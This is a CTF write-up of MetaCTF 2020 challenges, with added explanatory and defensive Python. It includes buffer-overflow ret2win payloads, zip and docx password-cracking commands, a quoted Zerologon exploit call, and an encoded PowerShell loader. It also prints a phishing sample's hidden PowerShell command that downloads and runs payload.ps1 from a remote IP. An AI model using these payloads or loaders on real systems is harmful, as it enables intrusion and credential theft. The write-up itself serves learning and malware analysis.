MetaCTF 2020

Find all source files on my GitHub repository: https://git.landon.pw/r/capture-the-flag/tree/main/metactf/2020

Binary Exploitation

Baffling Buffer 0 - 150pts

Tools: python, netcat

While hunting for vulnerabilities in client infrastructure, you discover a strange service located at host1.metaproblems.com 5150. You’ve uncovered the binary and source code of the remote service, which looks somewhat unfinished. The code is written in a very exploitable manner. Can you find out how to make the program give you the flag?

When analyzing the bb0.c file, I noticed a 48-byte char array, ‘buf’, is created. The ‘vuln()’ function then uses ‘gets’ to write into that buffer with no length check. Thus, a simple buffer overflow can be triggered using:

python3 -c "print('a'*100)" | ncat host1.metaproblems.com 5150

Baffling Buffer 1 - 225pts

Tools: python, netcat, gdb

After pointing out the initial issue, the developers issued a new update on the login service and restarted it at host1.metaproblems.com 5151. Looking at the binary and source code, you discovered that this code is still vulnerable.

Looking at the source code, we notice that the flag is printed by an entirely different function, ‘win()’. This means we will have to overflow the buffer far enough to overwrite the saved return address and redirect execution into that function. If we look at the ‘vuln()’ function, we notice a ‘strcmp’ between the buffer and “Sup3rs3cr3tC0de”. Per the C docs:

“This function starts comparing the first character of each string. If they are equal to each other, it continues with the following pairs until the characters differ or until a terminating null-character is reached.”

We can try to trick the ‘strcmp’ call by adding a null-terminating character to “Sup3rs3cr3tC0de” and then adding our overflow data.

First, I simply ran bb1 with “Sup3rs3cr3tC0de”, a null-terminator, and some extra characters to see if it would segfault.

python3 -c "print('Sup3rs3cr3tC0de\x00'+'a'*50)" | ./bb1

As I thought, it segfaulted. Thus, we can modify our input to overwrite the saved return address and land in the ‘win()’ function. First, we have to find that function’s address, which can be done using GDB.

$ gdb bb1
(gdb) break main
(gdb) run
(gdb) info address win
>> Symbol "win" is at 0x401172 in a file compiled without debugging.

Now, it’s a bit of trial and error to find the correct length to overflow. We also need to enable core dumps so that we can check exactly where the program segfaults.

$ ulimit -c unlimited
$ python3 -c "print('Sup3rs3cr3tC0de\x00'+'a'*41)" | ./bb1
>> Access granted!
>> zsh: done                              python3 -c "print('Sup3rs3cr3tC0de\x00'+'a'*41)" |
>> zsh: segmentation fault (core dumped)  ./bb1
$ gdb -q -c core -ex quit
>> Core was generated by ./bb1.
>> Program terminated with signal SIGSEGV, Segmentation fault.
>> #0  0x0000000000400061 in ?? ()

From here, we can see that the program crashed trying to return to 0x400061. 0x61 is the ASCII code for ‘a’, and the 0x00 byte above it is the terminator that ‘gets’ writes after discarding the newline, so the 41st ‘a’ landed on the lowest byte of the saved return address: we have one too many A’s. All we have to do is print 40 a’s and then append the address of ‘win()’ as little-endian bytes; the fourth byte that completes 0x00401172 is again supplied by the terminator from ‘gets’.

$ python3 -c "print('Sup3rs3cr3tC0de\x00'+'a'*40+'\x72\x11\x40')" | ncat host1.metaproblems.com 5151
>> Access granted!

And we retrieved our flag.
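To see why the core dump reads 0x400061 and why three address bytes are enough, here is an added Python model of the stack frame and of the gets() semantics involved; it is not code from the write-up or from the challenge binaries. It assumes bb1 has the same 48-byte ‘buf’ as bb0 (the write-up does not state bb1’s size), an 8-byte saved rbp between ‘buf’ and the return address, and a hypothetical original return address of 0x4011de; only the win() address and the payloads come from the write-up.

```python
import struct

BUF_SIZE = 48        # assumed: same 48-byte buffer as bb0.c (bb1's size is not given)
SAVED_RBP = 8        # x86-64 frame: saved rbp sits between buf and the return address
RET_OFFSET = BUF_SIZE + SAVED_RBP   # 56 bytes from the start of buf to the saved return address
ORIG_RET = 0x4011DE  # hypothetical original return address back into main()
WIN_ADDR = 0x401172  # address of win() as reported by gdb in the write-up

PASSWORD = "Sup3rs3cr3tC0de\x00"   # 16 bytes: strcmp stops at the embedded NUL


def python_print(s: str) -> bytes:
    """What `python3 -c "print(...)"` actually sends down the pipe: UTF-8 text plus a newline."""
    return s.encode("utf-8") + b"\n"


def gets_into_frame(stdin: bytes) -> bytearray:
    """Model a frame laid out as [buf][saved rbp][return address] and apply gets():
    copy everything up to the first newline, drop the newline, append a NUL.
    gets() has no bound, so the copy simply runs past buf when the input is longer."""
    frame = bytearray(RET_OFFSET + 8)
    struct.pack_into("<Q", frame, RET_OFFSET, ORIG_RET)
    line = stdin.split(b"\n", 1)[0] + b"\x00"
    frame[: len(line)] = line          # the overflow: no length check, exactly like gets()
    return frame


def return_address(frame: bytearray) -> int:
    """Read back what the function will 'ret' to."""
    return struct.unpack_from("<Q", frame, RET_OFFSET)[0]


def ret_after(payload: str) -> int:
    """Return address left in the frame after feeding one print()-style payload to gets()."""
    return return_address(gets_into_frame(python_print(payload)))


if __name__ == "__main__":
    for n in (10, 40, 41):
        print(f"{n:2d} a's -> ret = {ret_after(PASSWORD + 'a' * n):#018x}")
    print(f"40 a's + address -> ret = {ret_after(PASSWORD + 'a' * 40 + chr(0x72) + chr(0x11) + chr(0x40)):#x}")
```

With 41 a’s the model reproduces the crash address from the core dump (0x61 from the last ‘a’, 0x00 from the terminator), and with 40 a’s plus the three address bytes it lands exactly on win(). The same model makes the fix obvious: any input longer than 56 bytes reaches the return address because gets() never checks a length, so a bounded read such as fgets(buf, sizeof buf, stdin) would have closed both challenges.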

Cryptography

Crypto Stands for Cryptography - 100 pts

Welcome to the crypto team! We help consult in a variety of areas around the security department, helping to make sure our company is using proper encryption, data storage, and data transfer mechanisms. The data security team said they currently use something called Base64 to “encrypt” data. They want to know if that’s a secure way to store sensitive data, and provided a sample of data: TWV0YUNURntiYXNlNjRfZW5jMGRpbmdfaXNfbjB0X3RoZV9zYW1lX2FzX2VuY3J5cHRpMG4hfQ== Is it secure? Can you crack it?

The flag for this challenge can be found by decoding the base64 string.

echo "TWV0YUNURntiYXNlNjRfZW5jMGRpbmdfaXNfbjB0X3RoZV9zYW1lX2FzX2VuY3J5cHRpMG4hfQ==" | base64 --decode

ROT-26 - 150pts

Tools: dCode

We’ve applied some encoding to obfuscate our messages. There’s no way you can figure out the original message now?! I applied the unbreakable ROT 26 algorithm: g!0{]n`7*+0y~+1|(!y.+0yKM9

The flag can be decoded from the ROT-26 string by simply using an online decoder such as Dcode.fr.

Welcome to the Obfuscation Games - 175pts

During a recent incident response investigation, we came across this suspicious command executed by an attacker, and we’d like you to analyze it. Malware authors like to obfuscate their payloads to make it harder, but we’re sure you’re up to the task. See if you can figure out what’s happening without even running it!

$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("H4sIAEFgjl8A/xXMMQrCQBCF4as8FltPIFaCnV3A8jFmn8ngupuYaUS8e5LyL77//vHQcWxLIHWj8Cw2wBd4RWyp2resjMm+pVlOJxzmGWekm8Iu3fU3ScXrwIf1L26C+4CtijukBY3hb/3TCj2Ieh9qAAAA"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();

Looking at the PowerShell one-liner, we notice it decodes a base64 string into a MemoryStream, wraps that stream in a GzipStream, and then executes the decompressed text with Invoke-Expression (‘IEX’). Running the PowerShell code reveals that the flag is in the payload, but nothing needs to be executed: we can simply pipe the decoded base64 string into a .gz file and gunzip it.

echo "H4sIAEFgjl8A/xXMMQrCQBCF4as8FltPIFaCnV3A8jFmn8ngupuYaUS8e5LyL77//vHQcWxLIHWj8Cw2wBd4RWyp2resjMm+pVlOJxzmGWekm8Iu3fU3ScXrwIf1L26C+4CtijukBY3hb/3TCj2Ieh9qAAAA" | base64 --decode > meta.gz

Then, we can decompress the gzip and simply view the file contents.

gunzip meta.gz
cat meta

The Last Great Zip File - 200pts

Tools: JohnTheRipper

Help! I’ve created a zip archive that contains my favorite flag, but I forgot the password to it. Can you help me recover my flag back? You may need to use another program such as wget to download the file if your browser is blocking the download. Now to get the password hash from the zip file…

We can use zip2john to convert the encrypted zip file to a format that can be cracked by John.

zip2john flag.zip > hash

Then, we can use John alongside rockyou.txt to crack the password.

john --format=PKZIP --wordlist=/usr/share/wordlists/rockyou.txt hash

This will reveal the zip password to be “Soldat*13” which allows us to open the zip and reveal the flag.

Board Meeting Gone Wrong - 325pts

Tools: Python, JohnTheRipper, Hashcat

I stole this sensitive document that contains some really important board notes. I have a feeling I can get some serious insight on stonks here. There are a few things I know about the person I stole it from. He likes animals, he likes to speak like he’s a hacker to make himself seem cool, and he was born in 1972. I hope that helps. Can you help me crack it? I will make sure to share some of the profits.

I began by finding a basic animal wordlist. I found this and downloaded it.

wget https://raw.githubusercontent.com/sroberts/wordlists/master/animals.txt

Then, I needed to convert the animals into leetspeak. I created a Python script to do this.

# Characters to substitute; everything else is copied through unchanged.
leet = {
    'a': '@',
    'e': '3',
    'i': '1',
    'o': '0',
    's': '5',
    't': '7'
}

# Both files are closed automatically when the block ends.
with open("animals.txt") as f, open("out.txt", 'a') as out:
    for line in f:
        word = line.rstrip("\n")        # drop the newline; str.strip() returns a new string, it does not modify `line`
        replaced = "".join(leet.get(c, c) for c in word)
        out.write(replaced + "1972" + "\n")   # birth year appended to every candidate

This script reads animals.txt line by line, replaces each character with its mapping from the leet dictionary (leaving unmapped characters as they are), appends 1972 to the end of the word, and writes the result to out.txt.

Now, we have our wordlist. We must prepare Board_Meeting_Notes.docx for cracking. First, we will use office2john to create a hash for the docx file. Running

office2john Board_Meeting_Notes.docx > hash

will give us our hash file. Then, we can use Hashcat to crack the hash. (You could also use John, but I decided to use Hashcat as I used John in the last password cracking challenge.)

$ hashcat -a 0 -m 9600 hash out.txt
>> $office$*2013*100000*256*16*e6e06de5805713d9d971f4bcb249e0c6*34a42cf8762b521292400e6854d4be75*a1a5a0a3b7038ab0fd37115744a0ca264e4f88a33110bed83440ca9668e9b138:d0lph1n1972

We can then use the cracked password to open the docx and obtain the flag.

Reconnaissance

Big Breaches - 150pts

How many unique emails were exposed in the biggest single collection of breached usernames/passwords? Provide the answer (flag) in the format MetaCTF{###,###}

The ‘Collection #1’ data breach is the biggest collection of breached usernames and passwords. Troy Hunt has a page dedicated to Collection #1: https://www.troyhunt.com/the-773-million-record-collection-1-data-reach/. If we take a look through the information, we can find the number of unique emails breached.

Not So Itsy Bitsy Spider - 200pts

Recent reporting indicates that a prominent ransomware operator, known as WIZARD SPIDER, was able to deploy Ryuk ransomware in an environment within 5 hours of compromise. What recent, critical vulnerability was exploited in this environment to gain elevated privileges? The flag will be in the following format: CVE-XXXX-XXXX

I began looking for the answer by searching “Ryuk ransomware CVE 2021” and found CVE-2021-40444, which attacks Microsoft Office. However, that flag was incorrect. I then realized the challenge is from 2020, not 2021, so “latest” would refer to 2020 CVEs. If we Google “Ryuk ransomware CVE” we can find a list of all known exploits that were used to infect systems with Ryuk (https://cybersecurity.bd.com/bulletins-and-patches/ryuk-ransomware) and we will find the most “recent” CVE.

Diving Into The Announcement - 225pts

Vulnerabilities are patched in software all the time, and for the most serious ones, researchers work to build proof-of-concept (POC) exploits for them. As defenders, we need to continuously monitor when new public exploits drop, figure out how they work, and ensure we’re protected against them. Recently, Microsoft announced CVE-2020-1472. Your task is to locate a public exploit for it and identify the vulnerable function that the POCs call. The flag will be the function’s name.

CVE-2020-1472 (“Zerologon”): “An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller”

VoidSec has published a checker and exploit code here. Taking a look at their cve-2020-1472-exploit.py, we will find their attempt to authenticate using the vulnerability:

try:
    server_auth = nrpc.hNetrServerAuthenticate3(
        rpc_con, dc_handle + "\x00", target_computer + "$\x00",
        nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
        target_computer + "\x00", ciphertext, flags
    )

Thus, the vulnerable function (and our flag) is hNetrServerAuthenticate3.

Reverse Engineering

REDACTED - 225pts

Tools: Photoshop

The CEO of Cyber Corp has strangely disappeared over the weekend. After looking more into his disappearance, the Local Police Department thinks he might have gotten caught up in some illicit activities. The IT Department just conducted a search through his company-provided laptop and found an old memo containing a One Time Password to log into his e-mail. However, it seems as if someone has redacted the code; can you recover it for us?

For this challenge, I used Adobe Photoshop. I’m not sure if there’s a similar method using other alternatives such as Gimp or Affinity, but I would assume there should be.

First, I opened cybercorp_memo.pdf using Photoshop. Then, an ‘Import PDF’ dialog box opened, allowing me to configure the way the PDF was imported. On the ‘Select’ option, rather than choosing ‘Pages’, I chose ‘Images.’ This imports the embedded images individually, so the image layer below the black box can be extracted.

Once you load the PDF that way, the flag will be revealed.

Web Exploitation

High Security Fan Page - 125pts

Uh oh, I woke up to hear that some Swifties seem to have sabotaged my Katy Perry fan page! After writing about why KP is clearly the better artist, I believe they hacked into the system and somehow changed my password! I need to publish a big story today before TMZ steals my scoop, however I can’t find my way back into the admin panel. Can you please help me out by finding my password so I can get back to work? Note: obviously most sites aren’t built like this, but it’s good to get familiar with examining how a website’s source code looks, how resources get loaded in, etc :) https://metaproblems.com/a3263ca2855a26f06bd679ac3e240af9/

While checking the requests made upon attempting to log in, you will notice no requests are actually made. Thus, the login verification must be client-side. Checking the resources of the webpage, there is a framework.js JavaScript file that contains the username and password used to log in.

Barry’s Web Application - 150pts

I’ve made this cool new web application that I plan to use to host a blog. Please check it out at http://host1.metaproblems.com:5620/ Right now it’s still currently being built, but I hope you enjoy what’s there so far!

Browsing to Barry’s website, we will see we are redirected to http://host1.metaproblems.com:5620/dev/webapp/index.html. Simply walking up the path to http://host1.metaproblems.com:5620/dev exposes a directory listing, and in it we will find a docs folder containing the flag.

Cookies are used by websites to keep track of user sessions and help with authentication. Can you spot the issue with this site and convince it that you’re authenticated? https://metaproblems.com/e7fce2f2fcac584b49fe615b11784ff3/

After attempting to enter the secret code, a cookie called ‘cm_authenticated’ is set with a value of 0. The server trusts this client-controlled value, so setting the cookie’s value to 1 and refreshing the page will authenticate your account.
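Both web challenges above fail for the same reason: the authentication decision (the credentials in framework.js, the 0/1 in ‘cm_authenticated’) lives on the client, where the user can read or rewrite it. The following is an added Python example, not code from the challenge sites, that puts the vulnerable cookie check beside a hardened form in which the server signs the cookie with an HMAC it alone knows. The cookie name comes from the challenge; the user names, the ‘user:flag.tag’ layout and the secret are constructed for the example.

```python
import hashlib
import hmac
import secrets

# Constructed server-side secret. In a real deployment it is loaded from configuration
# and never shipped to the browser; the browser only ever sees cookies signed with it.
SERVER_SECRET = secrets.token_bytes(32)


def naive_is_authenticated(cookies: dict) -> bool:
    """The pattern from the challenge: trust a client-supplied flag outright."""
    return cookies.get("cm_authenticated") == "1"


def make_session_cookie(user: str, authenticated: bool) -> str:
    """Hardened form: the value carries an HMAC-SHA256 tag over its contents, so any
    change to the body (user or flag) makes the tag fail to verify."""
    body = f"{user}:{int(authenticated)}"
    tag = hmac.new(SERVER_SECRET, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}.{tag}"


def verify_session_cookie(value: str):
    """Return (user, authenticated) when the tag verifies, otherwise None."""
    try:
        body, tag = value.rsplit(".", 1)
        user, flag = body.split(":", 1)
    except ValueError:                      # malformed cookie: no tag or no separator
        return None
    expected = hmac.new(SERVER_SECRET, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):   # constant-time compare
        return None
    return user, flag == "1"


def hardened_is_authenticated(cookies: dict) -> bool:
    parsed = verify_session_cookie(cookies.get("cm_authenticated", ""))
    return parsed is not None and parsed[1]


def tamper(cookie: str) -> str:
    """Exactly what the write-up does to the naive cookie: flip the 0 to a 1."""
    body, tag = cookie.rsplit(".", 1)
    return body.replace(":0", ":1") + "." + tag


if __name__ == "__main__":
    guest = make_session_cookie("guest", False)
    print("naive, value forged to 1:    ", naive_is_authenticated({"cm_authenticated": "1"}))
    print("signed, flag flipped to 1:   ", hardened_is_authenticated({"cm_authenticated": tamper(guest)}))
    print("signed, issued for admin:    ", hardened_is_authenticated({"cm_authenticated": make_session_cookie("admin", True)}))
```

Flipping the digit in the signed cookie is detected because the tag no longer matches the body, and without SERVER_SECRET a client cannot compute a new tag. A server-side session store (an opaque random ID looked up in a database) is the more common production choice; the signed cookie is the smallest change that removes the trust in client-held state.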

Forensics

Forensics101 - 100pts

Sometimes in forensics, we run into files that have odd or unknown file extensions. In these cases, it’s helpful to look at some of the file format signatures to figure out what they are. We use something called “magic bytes” which are the first few bytes of a file. What is the ASCII representation of the magic bytes for a RAR archive?

If we look at the Wikipedia page listing file signatures, https://en.wikipedia.org/wiki/List_of_file_signatures, we can find the signature for RAR archives.

Staging in 1… 2… 3 - 150pts

The Incident Response (IR) team identified evidence that a Threat Actor accessed a system that contains sensitive company information. The Chief Information Security Officer (CISO) wants to know if any data was accessed or taken. There was a suspicious file created during the timeframe of Threat Actor activity: C:\123.tmp. Can you check it out?

To find the flag, the file can be analyzed using

strings 123.tmp
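The two forensics steps above, matching magic bytes and pulling printable strings out of an unknown file, are small enough to implement directly. Here is an added Python example (not part of the write-up) that does both: a signature table covering the RAR format asked about in Forensics101 plus a few other common types, and a minimal equivalent of the strings command used on 123.tmp. The sample bytes are constructed for the example; the real 123.tmp is not reproduced here.

```python
import re
from typing import Optional

# (name, offset, signature). Signatures are from the public file-signature tables;
# the RAR ones read "Rar!" in ASCII followed by non-printable bytes.
SIGNATURES = [
    ("rar",  0, b"Rar!\x1a\x07\x00"),      # RAR 1.5 - 4.x
    ("rar5", 0, b"Rar!\x1a\x07\x01\x00"),  # RAR 5.x
    ("zip",  0, b"PK\x03\x04"),            # also docx, jar, apk, ...
    ("gzip", 0, b"\x1f\x8b"),
    ("7z",   0, b"7z\xbc\xaf\x27\x1c"),
    ("pdf",  0, b"%PDF"),
    ("png",  0, b"\x89PNG\r\n\x1a\n"),
    ("elf",  0, b"\x7fELF"),
    ("pe",   0, b"MZ"),
]


def identify(data: bytes) -> Optional[str]:
    """Return the name of the first signature matching `data`, longest signatures first
    so that the RAR 5 header is not mistaken for the older RAR header."""
    for name, off, sig in sorted(SIGNATURES, key=lambda s: -len(s[2])):
        if data[off:off + len(sig)] == sig:
            return name
    return None


def ascii_magic(name: str) -> str:
    """Render a signature the way a hex dump's ASCII column would: dots for non-printables."""
    sig = next(sig for n, _, sig in SIGNATURES if n == name)
    return "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in sig)


def strings(data: bytes, min_len: int = 4) -> list:
    """Equivalent of `strings -n <min_len>`: runs of printable ASCII at least min_len long."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


# Constructed stand-in for a staging file: a RAR header, some binary, and a few names inside.
SAMPLE_123_TMP = (
    b"Rar!\x1a\x07\x00" + b"\x00\x01\x02\x03"
    + b"board_notes_export.xlsx" + b"\x00\x00" + b"ok" + b"\xff"
    + b"staged_for_upload" + b"\x00"
)

if __name__ == "__main__":
    print("type:", identify(SAMPLE_123_TMP))             # rar
    print("ascii magic:", ascii_magic("rar"))             # Rar!...
    for s in strings(SAMPLE_123_TMP):
        print("string:", s)
```

A file with a misleading or missing extension is classified by its first bytes rather than its name, which is exactly why the challenge asks for the magic bytes; the strings pass then gives the same quick look at embedded names and paths that strings 123.tmp gave in the challenge.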

Publish3r - 225pts

We believe we found a malicious file on someone’s workstation. Judging by looking at it, the file likely came from a phishing email. Anyways, we’d like you to analyze the sample, so we can see what would have happened if it executed successfully. That way we can hunt for signs of it across the enterprise. Your flag will be the URL that the malware is trying to reach out to! Can you do it? Format: MetaCTF{http://………} Note: We’ve put the actual file in an encrypted 7z so your browser doesn’t complain when downloading it (and our site doesn’t get flagged as malware). The password is metactf

After unzipping the 7zip archive, we are presented with Publish3r.pub. Let’s take a look at the file contents using strings Publish3r.pub. If we go through all the strings, one stands out from the rest:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -exec Bypass -windowstyle hidden -enc SQBFAHgAIAAoACgAbgBFAFcALQBPAEIASgBlAEMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACgAIgBoAHQAdABwADoALwAvADEAMwAuADMANwAuADEAMAAuADEAMAA6ADQANAA0ADMALwBkAG8AYwAvAHAAYQB5AGwAbwBhAGQALgBwAHMAMQAiACkAKQApAA==

Here we have a PowerShell command whose script body is passed base64-encoded through the ‘-enc’ argument. (‘-enc’ expects UTF-16LE text, so the raw decode contains a NUL byte after every character; the terminal simply does not display them.) Let’s decode it using

echo "SQBFAHgAIAAoACgAbgBFAFcALQBPAEIASgBlAEMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACgAIgBoAHQAdABwADoALwAvADEAMwAuADMANwAuADEAMAAuADEAMAA6ADQANAA0ADMALwBkAG8AYwAvAHAAYQB5AGwAbwBhAGQALgBwAHMAMQAiACkAKQApAA==" | base64 --decode

And we can see the actual PowerShell script being executed:

IEx ((nEW-OBJeCt net.webclient).downloadstring(("http://13.37.10.10:4443/doc/payload.ps1")))
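The Obfuscation Games one-liner and this Publish3r command are the two loader shapes analysts meet most often: a base64 blob that gunzips to script text, and a base64 blob of UTF-16LE text handed to ‘-enc’. Decoding either by hand works, but it is easy to get the text encoding wrong or to be tempted to just run the thing. Here is an added Python triage helper, not part of the write-up, that decodes both shapes statically and lists the URLs the decoded script references. The ‘-enc’ command line is the real one from the Publish3r sample above; the gzip one-liner is a constructed stand-in with a harmless body so that the example is self-contained (the real blob from the Obfuscation Games challenge can be pasted in the same way).

```python
import base64
import gzip
import re

URL_RE = re.compile(r"https?://[^\s\"'()]+")
B64_ARG_RE = re.compile(r"FromBase64String\(\"([A-Za-z0-9+/=]+)\"\)")
ENC_ARG_RE = re.compile(r"-enc(?:odedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_stage(b64: str) -> str:
    """Turn one base64 blob from a PowerShell loader into readable text without executing it.
    Handles the gzip'd MemoryStream (magic bytes 1f 8b) and the UTF-16LE text that
    `powershell -enc` expects (a NUL byte follows every ASCII character)."""
    raw = base64.b64decode(b64)
    if raw[:2] == b"\x1f\x8b":
        raw = gzip.decompress(raw)
    if len(raw) >= 2 and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("utf-8", errors="replace")


def extract_blobs(command_line: str) -> list:
    """Pull the base64 arguments out of a loader command line, whichever shape it uses."""
    return B64_ARG_RE.findall(command_line) + ENC_ARG_RE.findall(command_line)


def triage(command_line: str) -> dict:
    """Decode every blob in the command line and collect the URLs the decoded script references."""
    stages = [decode_stage(b) for b in extract_blobs(command_line)]
    urls = sorted({u for s in stages for u in URL_RE.findall(s)})
    return {"stages": stages, "urls": urls}


# Real command line recovered from Publish3r.pub, as shown in the write-up.
PUBLISH3R_CMD = (
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -exec Bypass -windowstyle hidden -enc "
    "SQBFAHgAIAAoACgAbgBFAFcALQBPAEIASgBlAEMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEA"
    "ZABzAHQAcgBpAG4AZwAoACgAIgBoAHQAdABwADoALwAvADEAMwAuADMANwAuADEAMAAuADEAMAA6ADQANAA0ADMALwBkAG8AYwAvAHAA"
    "YQB5AGwAbwBhAGQALgBwAHMAMQAiACkAKQApAA=="
)

# Constructed stand-in for the Obfuscation Games one-liner: same MemoryStream/GzipStream shape,
# harmless body, placeholder host. Built at import time so the example needs no external file.
_INNER = 'Write-Host "constructed sample"; $u = "http://stage2.example.invalid/next.ps1"'
CONSTRUCTED_GZIP_CMD = (
    '$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("'
    + base64.b64encode(gzip.compress(_INNER.encode())).decode()
    + '"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,'
    "[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();"
)

if __name__ == "__main__":
    for cmd in (PUBLISH3R_CMD, CONSTRUCTED_GZIP_CMD):
        result = triage(cmd)
        print("decoded:", result["stages"][0])
        print("urls:   ", result["urls"])
```

The UTF-16LE test is the part that matters for ‘-enc’: decoding that blob as UTF-8 yields the same letters separated by NULs, which breaks substring searches and indicators unless the NULs are stripped. For the gzip shape the gzip magic bytes are checked before decompressing, so an unrelated blob falls through to plain text instead of raising.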

Open Thermal Exhaust Port - 275pts

Tools: Wireshark

Our TCP connect Nmap scan found some open ports it seems. We may only have a pcap of the traffic, but I’m sure that won’t be a problem! Can you tell us which ones they are? The flag will be the sum of the open ports. For example, if ports 25 and 110 were open, the answer would be MetaCTF{135}.

Let’s open nmap_scan.pcapng using Wireshark. We can apply the filter ‘tcp.flags.ack == 1 && tcp.flags.syn == 1’ to show only SYN-ACK replies, which a TCP connect scan receives from open ports (closed ports answer with RST-ACK instead). The source port of each SYN-ACK is an open port; summing those ports gives the flag.
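The Wireshark filter is a test on two bits of the TCP header, so the same logic can be run over raw packets without Wireshark. The following is an added Python example, not part of the write-up: it builds a small constructed capture of a connect scan (three probed ports, two open, one closed, one retransmitted SYN-ACK), parses the TCP flag bits with struct, and sums the source ports of SYN-ACK replies exactly as the challenge asks. The addresses and ports are constructed; nmap_scan.pcapng itself is not reproduced here.

```python
import struct

SYN, RST, ACK = 0x02, 0x04, 0x10   # TCP flag bits (low byte of the offset/flags field)


def tcp_header(sport: int, dport: int, flags: int) -> bytes:
    """Build a minimal 20-byte TCP header with no options; only ports and flags matter here."""
    offset_flags = (5 << 12) | flags   # data offset = 5 words, then the 9 flag bits
    return struct.pack("!HHIIHHHH", sport, dport, 0, 0, offset_flags, 65535, 0, 0)


def parse_tcp(header: bytes):
    """Return (source port, destination port, flags) from a raw TCP header."""
    sport, dport, _seq, _ack, offset_flags = struct.unpack("!HHIIH", header[:14])
    return sport, dport, offset_flags & 0x1FF


def open_ports(packets, scanner_ip: str, target_ip: str) -> set:
    """Mirror of the Wireshark filter tcp.flags.syn == 1 && tcp.flags.ack == 1, restricted to
    the target's replies: a SYN-ACK means its source port is open (RST-ACK means closed)."""
    found = set()
    for src, dst, hdr in packets:
        sport, _dport, flags = parse_tcp(hdr)
        if src == target_ip and dst == scanner_ip and flags & (SYN | ACK) == (SYN | ACK):
            found.add(sport)
    return found


def flag_value(packets, scanner_ip: str, target_ip: str) -> int:
    """The challenge's answer: the sum of the open ports."""
    return sum(open_ports(packets, scanner_ip, target_ip))


# Constructed capture: (src ip, dst ip, tcp header). The scanner probes 22, 23 and 80.
SCANNER, TARGET = "10.0.0.5", "10.0.0.9"
CAPTURE = [
    (SCANNER, TARGET, tcp_header(40001, 22, SYN)),
    (TARGET, SCANNER, tcp_header(22, 40001, SYN | ACK)),    # 22 open
    (SCANNER, TARGET, tcp_header(40001, 22, ACK)),          # connect scan completes the handshake
    (SCANNER, TARGET, tcp_header(40001, 22, RST | ACK)),    # ... then tears it down
    (SCANNER, TARGET, tcp_header(40002, 23, SYN)),
    (TARGET, SCANNER, tcp_header(23, 40002, RST | ACK)),    # 23 closed
    (SCANNER, TARGET, tcp_header(40003, 80, SYN)),
    (TARGET, SCANNER, tcp_header(80, 40003, SYN | ACK)),    # 80 open
    (TARGET, SCANNER, tcp_header(80, 40003, SYN | ACK)),    # retransmitted reply; the set dedups it
]

if __name__ == "__main__":
    ports = open_ports(CAPTURE, SCANNER, TARGET)
    print("open ports:", sorted(ports))
    print("MetaCTF{%d}" % flag_value(CAPTURE, SCANNER, TARGET))
```

Restricting the match to packets from the target matters in a real capture: the scanner never sends SYN-ACK in a connect scan, but filtering on direction keeps the result honest if the pcap also contains unrelated traffic, and the set removes duplicate replies so a retransmission does not double-count a port in the sum.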